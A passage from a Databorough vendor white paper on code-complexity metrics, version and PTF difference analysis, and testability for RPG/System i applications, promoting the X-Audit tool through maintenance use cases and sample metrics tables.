Number of files updated - Number of program-described input files - Number of program-described output files - Number of applicable OVRDBFs - Number of applicable OPNQRYF statements - Average variable span by line numbers - Total variable span by line numbers - Average variable span by subroutine count - Total variable span by subroutine count - Number of delocalizing statements **RPG Metrics that indicate comprehensibility through Knowledge Mappability** - Number of non-hyper-local field names of less than x characters - Number of lines of comments **RPG Metrics that indicate comprehensibility through Chunkability** - Number of actual lines of code - Number of actual lines of comments - Greatest number of statements in a subroutine - Greatest number of statements in an IF/DO block - Number of implicit global parameters in a procedure - Number of delocalizing statements - Maintainability index – a formula developed by HP through experience - Number of /COPY members - Number of statements changed/added in the last 30-60-90-180-360 days - Number of months in the last 12 months that had one or more statements added/changed Some of these metrics are useful in more than one category and some do not fit neatly into these categories or are not perfect indicators, but nevertheless, it should be clear that there are in fact a number of useful metrics for understanding maintainability and overall program complexity. It should also be clear that these metrics can in fact be computed from typical source code, and in fact, that is precisely what Databorough's X-Audit tool delivers. If you are an experienced programmer who is managing a large application, you may look at this list and nod your head in recognition that many of these things would be interesting to have in a sortable list. But the real question is, *how can these metrics make a meaningful difference?* “What gets measured is what gets done.” - Tom Peters The following diagram shows the two primary ways in which software metrics can help manage a software maintenance operation. The left box is meant to show that metrics information can be used to bring better management and planning to your software projects. Some of the ways this information can be used are: - Adjust programming estimates, and therefore schedules and costs - Decide where more thorough analysis is necessary - Decide which resources are most appropriate for a task - Develop more appropriate and detailed testing plans. - Advise the business of additional project risks - Decide on alternative design plans to minimize changes to highly complex code For more information on how to use metrics for these purposes see the use case *Improving Project Management Through Better Information*. The right box is meant to show that metrics information can be used help you keep your software in a more maintainable state and thus preserve its long term value and ability to respond to business needs quickly and cost-effectively. This type of work can be analyzed in a couple ways, leading to tasks that: - Refactor programs that cross a certain threshold of complexity, or, - Refactor programs that have shown a large increase in complexity and are expected to continue to do so For more information on maintaining maintainability see the following use cases: - Monitoring changes in program complexity to preserve system value and extend its useful life - Targeting the top 1% of code that makes your job difficult - Finding programs most likely to produce defects when modified - Identifying unseen risks in your application - Cleaning up your system so it will recompile in its entirety **Uses of Historical and Time Series Information** The metrics discussed so far have been point in time metrics, in that they analyze source code and system objects at the time the metrics data is generated. For overall system management there are other useful perspectives that involve the dimension of time and change. One important perspective comes from understanding the change in the complexity and maintainability of your system over time: In this case metrics data collected at two or more different points in time are compared and the differences are shown. Some of the purposes of this sort of analysis are: - Determine the overall success of maintaining maintainability Complexity Metrics & Difference Analysis for better Application Management • Identify programs that cross a defined threshold of maintainability into unmaintainability and are thus candidates for Refactoring • Identify programs with sudden changes in complexity and that are forecast to continue with that trend, and are thus candidates for Refactoring or other attempts to keep maintainable • Identify increases in complexity where they were not expected, as a possible indication of poor programming or design See the use case Analyzing Metrics Time Series Data for Changes in System Complexity for more information. Version Comparison Version comparison is a facility that enables you to compare two different versions of your application at both the source code and object levels. Here are a few common scenarios where this is useful: • Compare a version of the application in use in one location to the version in use at another location • Compare a new version of a packaged product release to the version currently installed in order to understand the differences • Compare the current state of the application to the state it was in at a point in time in the past Difference Analysis A product such as Databorough’s X-Audit can do these comparisons and give detailed reports on both source and object differences between the versions. This information can point to changes that have to be made to bring two versions into harmony, or to integrate a new version of the source. By comparing versions from different points in time the analysis can reveal unexpected changes in the system in the interim. Information contained in such an analysis includes: • Files and programs that have been added, changed or deleted • Fields whose attributes have changed • Changes in database relationships and dependencies • Business rules that have been changed, added or deleted • Source statements that have been changed, added or deleted **Source Comparison** The last type of analysis in the above list can become very involved as potentially many source members may have been changed. It is important that a facility be available to quickly drill down from a changed source member to the specific lines of code that have been changed, added or deleted. A source comparison tool is essential for analyzing the differences in source code between the versions being compared. A good tool should show you: - Which source members have been changed and allow you to drill down into: - Which source statements have been changed, added or deleted Here is an example of a source comparison; in this case two H specification statements exist in the left hand version which do not exist in the right hand version: ![Source Comparison Example](image) **PTF Analysis – A Special Case of Version Comparison** If you are using a packaged software application that you have customized to meet your needs then you will probably have encountered the challenges that come when the vendor provides a new release of the product. How do you integrate your past changes with the new version of the software? What have you changed? What have they changed? This is in fact a serious challenge and potentially a great deal of analysis work. The following diagram depicts this situation. In this case an analysis of the source and objects in the new release of a packaged software product (bottom) are compared against the source and objects that have been customized in the past (middle) and the current base installation of the package (top). This sort of analysis can be quite labor intensive but the use of a tool like Databorough’s X-Audit PTF Analysis can save a great deal of time and prevent the risk of mistakes. The following types of conditions are analyzed and reported on. In these examples “PTF library” refers to the new release of package changes and "customized" library refers to the customizations that have been made over time to the base package. **Modified** - The object from the PTF library was found in one of the customized libraries. The PTF object will have to be reviewed and changes applied in the customized library must be manually applied to the object in the PTF library. **New** - The object from the PTF library was not found in the base repository. The PTF object can be placed in the base library. **Apply** - The object from the PTF library was found in one of the base libraries but not in any of the customized libraries. Therefore the PTF object can overlay the object in the base library. **Refers** - The object from the PTF library refers to one or more objects in one of the customized libraries. The PTF object will have to be analyzed to make sure all customized objects referred to still meet the requirements of this object. **Referenced** - The object from the PTF library is referenced by an object in one of the customized libraries. The customized objects will have to be reviewed to make sure the PTF object will still interface properly to the customized objects. Testability is one of the characteristics of Maintainability, which, again, is one of the ISO characteristics of software quality. **Testability and Metrics** Most metrics that pertain to complexity and maintainability, also pertain to testability. If a program is more complex, and more difficult to maintain, it tends to be more difficult to test. With perhaps a few exceptions, pretty much all of the metrics in the section Overview: Translating Quality into Measurable Items impact a program’s testability. **Improving Testability With Tools** Reducing code complexity can bring some relief in terms in testability, but more likely to make a more dramatic and immediate impact on testability is the use of tools. **Managing Code Complexity for Testability – Control Flow** The completeness of test plans is often measured in terms of coverage. There are several levels or dimensions of coverage to consider: - **Function**, or subroutine coverage – measures whether every function or subroutine has been tested - **Code**, or statement coverage – measures whether every line of code has been tested - **Branch** coverage – measures whether every case for a condition has been tested, i.e., tested for both true and false - **Loop** coverage – measures whether every case of loop processing has been tested, i.e. zero iterations, one iteration, many iterations - **Path** coverage – measures whether every possible combination of branch coverage has been tested. Large programs can have huge numbers of paths through them. A program with a mere 20 IF, DO or WHEN statements can have over one million different paths through it (paths = \(2^n\)). Removing redundant conditions, and organizing necessary conditions in the simplest possible way help to minimize control flow complexity and thus minimize both the probability of defects and the required testing effort. **Managing Code Complexity for Testability – Data Flow** Also of concern for managing testability is the impact of code implementation on the complexity of data flow. This type of complexity can be measured in a few Complexity Metrics & Difference Analysis for better Application Management different ways: Depth of transformation – A variable that is moved from an input file directly to an output file is said to a transformation degree of 1. If it is first multiplied by 10, for example, the degree is then 2. The more that data is transformed the more complex the test plans must be. Dispersion, or span of modification – If the statements that modify a given variable are scattered around a program it will both be more likely to have defects and more likely to require more testing. If a given variable is set three times in the span of ten consecutive statements that is much less likely to produce defects or testing challenges than if the variable is modified three times each in different subroutines separated by 1,000 lines of code. By considering these data flow complexity factors when designing the program code the ultimate testability and quality of the program can be increased. Using Tools To Improve Testability Tools can be of great assistance in the testing effort, bringing gains in both productivity and quality. Examples of tools are: Complexity metrics – as this paper discusses, understanding the complexity metrics of a program to be tested helps in preparing both project plans and testing plans. See the use cases Improving Project Management Through Better Information and Finding Programs Most Likely To Produce Defects When Modified for more information. Generation and Validation of Test Plans – see the section immediately below for more information on this. Tracking code and branch coverage – tools can be of great assistance in tracking whether all statements and conditions in a program have been tested. Generation and Validation of Test Plans A common method of developing a test plan is to follow a hierarchy as follows: – Business Processes – Test Cases – Test Scenarios In System I applications a given interactive program might typically be thought of at the test case level and have any number of individual test scenarios. A very useful approach to developing the test case and test scenarios is to translate the program into a UML Activity Diagram. This kind of diagram shows all the different use paths a user can follow in executing the program and provides an excellent foundation for the test scenarios. (note that these paths are not exactly the same thing as the code paths described above, though they are obviously related). Shown below is an example of a portion of an activity diagram as produced by X-Analysis which can be used to improve testing productivity and quality. In the above diagram from Databorough’s X-Analysis UML feature, each connector would typically be designated as a test scenario, with conditions, data, actions and results defined for that function. Use Cases for Metrics Reporting and Difference Analysis Find the Most Complex Code in My System Why it's important and valuable There are three categories of reasons for why this is valuable information: 1. Project planning – With complexity metrics you can make more fine-grained judgments about the strategy and planning of your projects. See the use case about improving project management for detailed information. 2. Proactive complexity mitigation – IT managers with a long term view of their system’s health take proactive measures to prevent their code from becoming excessively complex. See the use case about extending the life and value of your system for more information on this perspective. 3. Design recovery and migration – If you are extracting business rules or migrating your code to another language you may want to plan on manual, corrective activity to deal with overly complex code. What information is needed and why In this use case example we will use either or both of the basic complexity reports that are pre-configured in X-Audit: 1. COMPLEXP – metrics by program, or 2. COMPLEXS – metrics by subroutine Both of these reports have the same data except that the latter also has subroutine names, giving more detailed results. Otherwise, both of these contain the same metrics: - Number of actual lines of code - Greatest number of source records in a subroutine - Greatest number of statements in an IF/DO block - Cyclomatic complexity - Halstead volume - Maintainability index - Number of virtually global variables - Total or average variable span by line number or subroutine - Decision density - Number of database files Complexity Metrics & Difference Analysis for better Application Management - Number of called programs - Greatest depth of nested IF/DOs - Greatest depth of nested ELSEs - Number of GOTOs or CABxxs - Greatest depth of loops within loops - Decision density These reports both select all objects with an attribute of RPG or RPGLE. A little bigger picture: X-Audit provides a number of metrics for evaluating complexity. There are three ways to think about measuring the complexity of your code: 1. Using traditional, cross-language metrics, such as Cyclomatic Complexity, Halstead Volume and Maintainability Index. 2. Using additional metrics provided by X-Audit that are more language and System i specific. 3. Using your own custom metrics: A) Computed by you using the provided X-Audit formula, which enables you to combine either of the above metrics. B) Writing your own code analysis programs and creating your own application-specific metrics using the X-Audit user exit program facility. Evolving the Most Representative Metrics Eventually you will want to decide on which metrics best represent complexity in your application. These might be one or more of the pre-packaged metrics or some combination of them that you perform your own customized computations on. How to generate the report Select either of the above reports and click on Run Metrics Report on the main X-Audit screen. If you want to modify either of these reports you can make a copy of it and change any of the parameters. Analyzing the Results The first time you see the results of this report you will realize how much measurable information you’ve been missing. You will want to play with the data in a number of ways to develop a model of which metrics give you the best indication of your own system’s complexity. Here is an example of a screen-shot for a shorter version of the above reports: In this example all the metrics except Lines Of Code have been normalized to a scale of 1-100. Doing this helps read the results and also facilitates combining individual metrics into combined, weighted scores. Also in this example note that the first metric, “Base-Complex”, is a custom, user-defined metric that is comprised of several other metrics that the user has decided most accurately convey complexity in this particular application. Note that this is sorted by Base-Complex, and note how Lines Of Code does not correlate well to complexity. This has been shown by many studies over the years – Lines of Code is a poor indicator of complexity. ### Reducing Size of Application and Maintenance Workload by Removing unnecessary Code #### Why it's important and valuable Many systems accumulate dead objects or dead code with little apparent harm. The key word there is “apparent”. Many IT organizations waste an unknown number of hours maintaining, recompiling and testing objects that are no longer actually in use. Over a period of years the number of these objects tends to pile up, as does the amount of wasted effort. #### What information is needed and why In this use case example we will use either or both of the unused object reports that are pre-configured in X-Audit: 1. **UNUSEDOBJ** – unused objects, based on object description last used date 2. **UNUSEDCOD** – unused sections of code e.g., subroutines or procedures not called How to generate the report Select either of the above reports and click on Run Metrics Report on the main X-Audit screen. If you want to modify either of these reports you can make a copy of it and change any of the parameters. (See section How the Product Works for more information on the screen options available to you) Analyzing the Results The two reports work very differently and lead to different tasks you will want to undertake to reduce your maintenance workload. UNUSEDOBJ – this report looks at the last used date from System i object description data. Be sure you understand exactly how the last used date is set and reset on the System i for objects before archiving them. UNUSEDCOD – this report lists subroutines and procedures that have zero calls to them within their program. These represent sections of code that can be deleted. Be sure you follow good source management procedures, including archiving, before deleting code. Improve Project Management through Better Information Why it's important and valuable With complexity metrics you can make more fine-grained judgments about the strategy and planning of your projects. Complexity information can help you: a) Adjust programming estimates, and therefore schedules and costs b) Decide where more thorough analysis is necessary c) Decide which resources are most appropriate for a task d) Develop more appropriate and detailed testing plans e) Advise the business of additional project risks f) Decide on alternative design plans to minimize changes to highly complex code What information is needed and why This use case utilizes your evolved complexity metrics – the ones that best represent complexity in your system. How to Apply Metrics to Project Management Improving Estimates Research studies have shown that presenting information to programmers about the program they will be working on materially affects their estimates of the work to be done. By supplying some facts to supplement their intuition and experienced based judgment, you can obtain more realistic estimates of the amount of effort involved. Examples of what can improve the quality estimates include: - Number of calls to a subroutine to be changed - Number of calls made to a subroutine - Number of uses in a program of a variable to be changed - Number of uses in a program of a file to be changed - Cyclomatic complexity or other IF/DO metrics of code to be changed - Number of files, input formats and/or subfiles in a program - Number of statements in relevant programs, subroutines, or large IF/DO blocks to be changed Decide Where More Thorough Analysis is Necessary By understanding the complexity structure of a given program requiring modification, a manager can be sure a programmer has delivered a quality estimate by understanding what subroutines require changes and then comparing the programming estimates against the complexity metrics for those subroutines. If the values of certain variables in the program will be affected then the manager can also examine how many uses of the variables exist in the program, thus understanding the potential impact of the changes, and the amount of impact analysis required to do a quality job. For example, there is a large difference in the amount of analysis work required between adding a few lines of code to a simple section of the mainline that does not affect variables, and adding a few lines of code located in the middle of deeply nested IF/DO/ELSE blocks in a subroutine called from many places in the program, where those changes affect variables widely used throughout the program. Without doing the code research itself, a managers have had few options for evaluating the estimates provided by programmers. By simply asking programmers which subroutines they will be modifying the manager can now evaluate the complexity metrics of those code sections and make a more informed judgment of whether the programmer’s estimate is sufficiently considered. Decide Which Resources Are Most Suitable For a Task For a given project, once the list of programs to be modified has been compiled, the IT manager can look at the metrics for the programs and decide which ones require the use of resources with either special program knowledge or the ability to handle highly complex programs. While most IT managers know this to some degree from experience, the availability of metrics presents the basis for a more quantifiable and consistent decision process. Develop More Detailed and Appropriate Testing Plans By understanding which subroutines are to be modified, and what their complexity metrics are, the project plan can be adjusted to account for additional testing for more complex sections of code being changed. Useful metrics include all of the Cyclomatic and IF/DO complexity metrics, as well metrics relating to numbers of files and fields involved. Advise the business of additional project risks Complexity metrics represent tangible information that IT can present to the business when explaining the challenges of particular projects. The metrics can be used to explain why some tasks require more time than others, and why some tasks are more likely to result in production defects. By making complexity metrics a regular part of project plans presented to business stakeholders, IT can shape the overall process to be based more on facts rather than intuition and persuasion. Decide on alternative design plans to minimize changes to highly complex code For a given project, once the list of programs to be modified has been compiled, the IT manager can look at the metrics for the programs being changed and decide to investigate alternative design plans that might circumvent the most complex sections of code being changed. Obviously, all projects have more chance of success if they deal with the simplest possible code. Cleaning Up your System to Recompile in its Entirety Why it’s important and valuable Why this is important almost goes without saying, but it often becomes one of those things that is important but not urgent. What can make it more urgent is if you plan on doing something like any of the following: - Install a new release of packaged software - Re-engineer or migrate your system - Execute a large application enhancement project What information is needed and why There are a number of “alert” type metrics provided with X-Audit that are useful for this purpose. Some of them directly indicate it is impossible to compile your system accurately, others indicate generally undesirable conditions that are worth investigating. Complexity Metrics & Difference Analysis for better Application Management - No source for existing object - Source was changed after object was created - No object for existing source - Logical file is duplicate of another - Logical file is not used in any programs - File has no members - File is internally described - File format level used in program does not match database file - Program has hard coded libraries How to generate the report This is a pre-configured report provided with X-Audit – see the category, Source/Object Reports. Targeting Top 1% of Code that makes your JOB Difficult Why it's important and valuable Numerous software studies have shown that the majority of defects come from a small percentage of programs, the majority of complexity in a system is contained in a small percentage of programs, maintenance tasks tend to revolve around a small percentage of programs, and so on. The Pareto Principle, aka, the 80-20 rule, doesn't apply, it's more like the 90-10 rule, or the 95-5 rule, or, like the title suggests, even the 99-1 rule. Here’s a formula worth considering: \[(\text{most complex code}) \cup (\text{most frequently changed code}) \rightarrow (\text{most troublesome, costly code})\] In other words, the intersection of your most complex code and your most volatile code deserves some serious attention! What is it that makes code both complex and volatile? - Defect repair leads to changes - Hard coding leads to changes - Inadequate design vs. business or technical needs leads to changes - Changes lead to ever increasing complexity - Complexity leads to defects And so on. Yes, there can be a vicious cycle at work. If you can identify your most complex, volatile code what can you do about it? • Remove hard coding. • Revisit other design aspects and see if it needs to be upgraded. • Have managed code walk through to inspect it for defects – various studies have put the cost of user-discovered defects at 10-100 times higher than developer discovered defects • Refactor the section of code to simplify it; possibly break it into smaller, more manageable and more testable pieces. What information is needed and why The first use case, How Can I Find the Most Complex Code In My System showed you how to do just that. What is needed for this use case is to combine that information with information about what source code is changed and how frequently. How to generate the report Depending on what you have done regarding defining which metrics you want to use for complexity analysis, you may be able to simply add the X-Audit metric SRCCHG360 to your metrics report. Alternatively you can run the report Source Change Volatility under the category Source/Object Reports and export all results to spreadsheets where you merge and analyze the complexity and volatility metrics results. X-Audit source volatility analysis works by analyzing source change dates in source files. This provides limited information. X-Audit also provides an interface for more detailed source change data that can be fed from your change management system. Finding Programs most likely to Produce Defects when Modified Why it's important and valuable Knowing which programs are the most likely to produce defects when modified can help you: • Seek alternative design solutions that avoid those programs • Adjust your programmer resource plan to place your most reliable programmers on those challenging programs • Allow for additional time and resources in project plans for more extensive testing • Alert business users to increased project risks Complexity Metrics & Difference Analysis for better Application Management - Decide to proactively refactor/redesign your programs **What information is needed and why** Most of the complexity metrics have some bearing on how likely it is that modifications will lead to defects for a given program, but certain metrics are generally more useful than others, in particular, those that relate to the difficulty of impact analysis, or indicate program volatility: - Number of virtually global variables - Total or average variable span by line number or subroutine - Decision density - Greatest depth of IF/DO/ELSE blocks, or GOTO count - Depth of subroutine calls - Number of called programs or external procedures - Number of statements changed in the last year **How to generate the report** This is a pre-configured report provided with X-Audit. Under the category, RPG Complexity Reports, select and run the report, Defect-prone programs. **Analyzing the Results** By developing a practice of tracking defects and measuring them against these defect analysis metrics, or others that you develop over time, you can refine your ability to predict defect levels and plan accordingly. --- **Identifying Unseen Risk in your Application** **Why it's important and valuable** This topic divides into two categories of risks: - Object level risks, related to system object management - Code level risks, related to the code of programs The reason why identifying risks is important is self-evident. Quantifying the potential costs of the risks is also important, more so for weighing the cost of the repair effort than for doing the analysis, which is as simple as running the report mentioned below. Complexity Metrics & Difference Analysis for better Application Management **What information is needed and why** There are many potential risk factors in a system, here are a few to consider: - Programs have non-approved hard coded libraries - No source code exists for an object - The source code has been changed since the object was created - The same field name is found in multiple files in a program - RPG UPDATE operations are done without listing fields - RPG WRITE operations exist for input/update files and no CLEAR operation is found **How to generate the report** This is a pre-configured report provided with X-Audit. Under the category, Source/Object Reports, select and run the report, Unseen Risks. --- **Monitoring Changes in Program Complexity to preserve System Value & Extend its life** **Why it's important and valuable** The second law of software evolution states, “as a system evolves, its complexity increases unless steps are taken to reduce it.” Or, as someone else said, "the act of maintaining software necessarily degrades it." Your applications are an asset of your business. As you maintain them over time you cause the value to depreciate by making them more complex and less maintainable. Arguably you are also increasing their value by adding functionality, but there is no doubt that applications become more time-consuming and costly to maintain as they age. Some IT organizations address this growing complexity by proactively maintaining maintainability. After establishing a set of metrics that best represents complexity for their applications, they periodically measure the complexity of the entire system. Programs that either cross a threshold of complexity or show large increases in complexity are candidates for refactoring. **What information is needed and why** This process is based on the set of metrics established in the first use case, *How Can I Find the Most Complex Code In My System?* Armed with that information, there are two basic approaches: - Refactor programs that cross a certain threshold of complexity - Refactor programs that have shown a large increase in complexity and are Complexity Metrics & Difference Analysis for better Application Management expected to continue to do so The following diagram depicts the growth in complexity of a particular program and shows that when it crossed a defined threshold of complexity it was Re-factored to preserve its maintainability: It is useful to store metrics in order to compare them to future values of the metrics. As the chart shows, analyzing the differences can reveal important patterns of complexity as it relates to overall analyzability, changeability, stability and testability. This information should also be reviewed with information about past program volatility and known plans for future projects. Analyzing Metrics Time Series Data for Changes in System Complexity Why it’s important and valuable There are at least two good examples of the benefits available by examining changes in complexity metrics over a period of time: - Patterns in complexity growth and system growth that are obscured in the hurry of day-to-day work can be seen and future development plans can be adjusted or created based on the new understandings - Observed increases in complexity that do not match expectations can reveal poor design or programming practices, which in turn may lead to corrections, better training or adjustments in future resource assignments What information is needed and why Obtaining this time series information is simply a matter of storing metrics at Complexity Metrics & Difference Analysis for better Application Management different points in time, calculating the differences and reporting on them. This is best done when an organization has identified the specific metrics that give the best indication of complexity and maintainability for the application. Here is an example of a baseline metrics report at a given point in time. In this case a baseline complexity metric has been customized by the user and the report is sorted top to bottom in that sequence. Also, all metrics scores have been normalized to a scale of 1-100. <table> <thead> <tr> <th>Obj</th> <th>BaseComplex</th> <th>MaintIdx</th> <th>DecDensity</th> <th>VarSpan</th> <th>LOC</th> </tr> </thead> <tbody> <tr> <td>AT201R2</td> <td>94</td> <td>94</td> <td>100</td> <td>109</td> <td>3,384</td> </tr> <tr> <td>AT144R</td> <td>88</td> <td>83</td> <td>77</td> <td>86</td> <td>3,784</td> </tr> <tr> <td>AT200R</td> <td>88</td> <td>85</td> <td>92</td> <td>96</td> <td>5,984</td> </tr> <tr> <td>AT198R</td> <td>84</td> <td>85</td> <td>79</td> <td>78</td> <td>6,720</td> </tr> <tr> <td>AT192R</td> <td>83</td> <td>93</td> <td>91</td> <td>82</td> <td>6,142</td> </tr> <tr> <td>AT156R</td> <td>71</td> <td>81</td> <td>80</td> <td>72</td> <td>4,899</td> </tr> <tr> <td>AT201R</td> <td>56</td> <td>46</td> <td>52</td> <td>56</td> <td>3,024</td> </tr> <tr> <td>AT110R</td> <td>24</td> <td>17</td> <td>17</td> <td>21</td> <td>664</td> </tr> <tr> <td>AT178R</td> <td>23</td> <td>19</td> <td>12</td> <td>4</td> <td>255</td> </tr> <tr> <td>AT112R</td> <td>15</td> <td>5</td> <td>13</td> <td>21</td> <td>340</td> </tr> </tbody> </table> At a later point in time we run the analysis again and get a similar set of results, but the metrics are now different. The following report shows which metrics have changed and by how much. A positive number indicates the metric value has increased. **Time Series Report Showing Changes In Metrics** <table> <thead> <tr> <th>Obj</th> <th>BaseComplex</th> <th>MaintIdx</th> <th>DecDensity</th> <th>VarSpan</th> <th>LOC</th> </tr> </thead> <tbody> <tr> <td>AT192R</td> <td>10</td> <td>-3</td> <td>1</td> <td>-1</td> <td>403</td> </tr> <tr> <td>AT156R</td> <td>9</td> <td>-1</td> <td>9</td> <td>0</td> <td>364</td> </tr> <tr> <td>AT201R</td> <td>9</td> <td>-4</td> <td>3</td> <td>3</td> <td>241</td> </tr> <tr> <td>AT201R2</td> <td>7</td> <td>-5</td> <td>2</td> <td>2</td> <td>176</td> </tr> <tr> <td>AT200R</td> <td>7</td> <td>-3</td> <td>1</td> <td>6</td> <td>228</td> </tr> <tr> <td>AT198R</td> <td>5</td> <td>-1</td> <td>5</td> <td>7</td> <td>-273</td> </tr> <tr> <td>AT110R</td> <td>3</td> <td>0</td> <td>-1</td> <td>3</td> <td>-36</td> </tr> <tr> <td>AT112R</td> <td>3</td> <td>3</td> <td>8</td> <td>0</td> <td>26</td> </tr> <tr> <td>AT178R</td> <td>1</td> <td>0</td> <td>7</td> <td>5</td> <td>48</td> </tr> <tr> <td>AT144R</td> <td>-1</td> <td>4</td> <td>6</td> <td>0</td> <td>106</td> </tr> </tbody> </table> In this example the program with the largest increase in the base complexity metric is listed first, showing an increase of 10. Correspondingly its maintainability has dropped by 3 and the number of lines of code have increased by 403. In this example what also stands out for the IT manager is that program AT201R... has had a substantial increased in base complexity of 9, yet the IT manager knows that he had only asked for a simple change to this program – that is worth investigating. **Analyzing Differences in Source Code and System Objects in different Versions** **Why it's important and valuable** There are a number of circumstances where it is useful to compare different versions of an application: - A software vendor delivers a new release of the application and you need to know what has changed so you can confirm your customizations or interfaces will work correctly - You operate with different versions of the software in different countries or for different subsidiaries or divisions and you need to understand the differences when planning for a new project - You need to compare a snapshot of the application from the past with the current version in order to track down system changes that are causing problems - A slightly different situation is when you have a packaged application for which you have made customizations and the vendor delivers a new release and you need to assess the impact of the new release on your customizations. **What information is needed and why** Performing an analysis for any of these circumstances involves comparing a large set of system and source code information. At a high level you might investigate some of these types of information for differences between the versions: - Commands - Parameters - Command processing and validity checking programs called - Database - Fields - Keys - Relationships - Logical files over each physical file - Constraints - Triggers - Select/omit criteria - Programs - Business rules Complexity Metrics & Difference Analysis for better Application Management - Bound modules - Program references - Subroutines - Bound service programs - Procedures - SQL queries - Source code - Individual statements added, changed or deleted Obviously this is a lot of information and accomplishing this task involves these primary capabilities: - Collecting and storing this information for two versions - For the fourth case listed in the top section you actually need to triangulate between three versions of the source and objects: the original base package, your customizations, and the new version of the base package - Analyzing the data and reporting on the differences. Databaorough’s X-Audit product provides the functionality to do these kinds of analysis. Steve Kilner © Databaorough
{"Source-Url": "http://www.databorough.com/downloads/White_Papers/Complexity-Metrics-and-Difference-Analysis-White-Paper.pdf", "len_cl100k_base": 13522, "olmocr-version": "0.1.50", "pdf-total-pages": 36, "total-fallback-pages": 0, "total-input-tokens": 70526, "total-output-tokens": 14601, "length": "2e13", "weborganizer": {"__label__adult": 0.000324249267578125, "__label__art_design": 0.00021660327911376953, "__label__crime_law": 0.00026535987854003906, "__label__education_jobs": 0.0007886886596679688, "__label__entertainment": 4.673004150390625e-05, "__label__fashion_beauty": 0.00010669231414794922, "__label__finance_business": 0.0003592967987060547, "__label__food_dining": 0.0002359151840209961, "__label__games": 0.0005903244018554688, "__label__hardware": 0.00040221214294433594, "__label__health": 0.00024259090423583984, "__label__history": 0.00011730194091796876, "__label__home_hobbies": 6.049871444702149e-05, "__label__industrial": 0.0001964569091796875, "__label__literature": 0.00018215179443359375, "__label__politics": 0.00015461444854736328, "__label__religion": 0.00025081634521484375, "__label__science_tech": 0.0021228790283203125, "__label__social_life": 7.003545761108398e-05, "__label__software": 0.006206512451171875, "__label__software_dev": 0.986328125, "__label__sports_fitness": 0.00021827220916748047, "__label__transportation": 0.0002157688140869141, "__label__travel": 0.00013947486877441406}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 63826, 0.00915]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 63826, 0.36962]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 63826, 0.93293]], "google_gemma-3-12b-it_contains_pii": [[0, 77, false], [77, 1156, null], [1156, 2719, null], [2719, 3940, null], [3940, 5702, null], [5702, 8306, null], [8306, 10605, null], [10605, 14101, null], [14101, 15662, null], [15662, 17656, null], [17656, 19316, null], [19316, 21497, null], [21497, 23414, null], [23414, 25585, null], [25585, 26685, null], [26685, 28036, null], [28036, 29979, null], [29979, 31312, null], [31312, 33051, null], [33051, 35146, null], [35146, 37631, null], [37631, 37982, null], [37982, 39647, null], [39647, 41539, null], [41539, 42999, null], [42999, 44774, null], [44774, 47491, null], [47491, 49615, null], [49615, 51290, null], [51290, 53214, null], [53214, 54924, null], [54924, 57084, null], [57084, 58540, null], [58540, 61336, null], [61336, 63023, null], [63023, 63826, null]], "google_gemma-3-12b-it_is_public_document": [[0, 77, true], [77, 1156, null], [1156, 2719, null], [2719, 3940, null], [3940, 5702, null], [5702, 8306, null], [8306, 10605, null], [10605, 14101, null], [14101, 15662, null], [15662, 17656, null], [17656, 19316, null], [19316, 21497, null], [21497, 23414, null], [23414, 25585, null], [25585, 26685, null], [26685, 28036, null], [28036, 29979, null], [29979, 31312, null], [31312, 33051, null], [33051, 35146, null], [35146, 37631, null], [37631, 37982, null], [37982, 39647, null], [39647, 41539, null], [41539, 42999, null], [42999, 44774, null], [44774, 47491, null], [47491, 49615, null], [49615, 51290, null], [51290, 53214, null], [53214, 54924, null], [54924, 57084, null], [57084, 58540, null], [58540, 61336, null], [61336, 63023, null], [63023, 63826, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 63826, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 63826, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 63826, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 63826, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 63826, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 63826, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 63826, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 63826, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 63826, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 63826, null]], "pdf_page_numbers": [[0, 77, 1], [77, 1156, 2], [1156, 2719, 3], [2719, 3940, 4], [3940, 5702, 5], [5702, 8306, 6], [8306, 10605, 7], [10605, 14101, 8], [14101, 15662, 9], [15662, 17656, 10], [17656, 19316, 11], [19316, 21497, 12], [21497, 23414, 13], [23414, 25585, 14], [25585, 26685, 15], [26685, 28036, 16], [28036, 29979, 17], [29979, 31312, 18], [31312, 33051, 19], [33051, 35146, 20], [35146, 37631, 21], [37631, 37982, 22], [37982, 39647, 23], [39647, 41539, 24], [41539, 42999, 25], [42999, 44774, 26], [44774, 47491, 27], [47491, 49615, 28], [49615, 51290, 29], [51290, 53214, 30], [53214, 54924, 31], [54924, 57084, 32], [57084, 58540, 33], [58540, 61336, 34], [61336, 63023, 35], [63023, 63826, 36]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 63826, 0.08143]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
9d53390063d64f7246d8a0618c7c448b33ce5e5e
